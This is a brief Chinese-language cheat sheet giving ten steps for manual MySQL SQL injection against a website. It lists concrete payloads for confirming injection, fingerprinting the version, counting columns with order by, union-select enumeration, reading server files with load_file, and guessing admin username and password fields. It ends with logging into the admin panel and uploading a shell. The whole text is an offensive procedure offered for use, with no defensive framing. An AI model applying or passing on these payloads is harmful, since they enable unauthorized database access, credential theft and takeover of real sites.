1.判斷是否存在注入,加';and 1=1;and 1=2
2.判斷版本 and ord(mid(version(),1,1))>51 /* 返回正常說明是4.0以上版本,可以用union 查詢
3.利用order by 暴字段,在網址後加 order by 10 /* 如果返回正常說明字段大於10
4.再利用union 來查詢准確字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,說明猜到准確字段數。如過濾了空格可以用/**/代替。
5.判斷數據庫連接帳號有沒有寫權限,and (select count(*) from mysql.user)>0 /*如果結果返回錯誤,那我們只能猜解管理員帳號和密碼了。
6.如果返回正常,則可以通過and 1=2 union select 1,2,3,4,5,6,load_file (char(文件路徑的ascii值,用逗號隔開)),8,9,10 /* 注:load_file (char(文件路徑的ascii值,用逗號隔開))也可以用十六進制,通過這種方式讀取配置文件,找到數據庫連接等。
7.首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user /* 如果返回正常,說明存在這個表。
8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2字段顯示出字段內容則存在些字段。
9.同理再猜解passWord字段,猜解成功再找後台登錄。
10.登錄後台,上傳shell。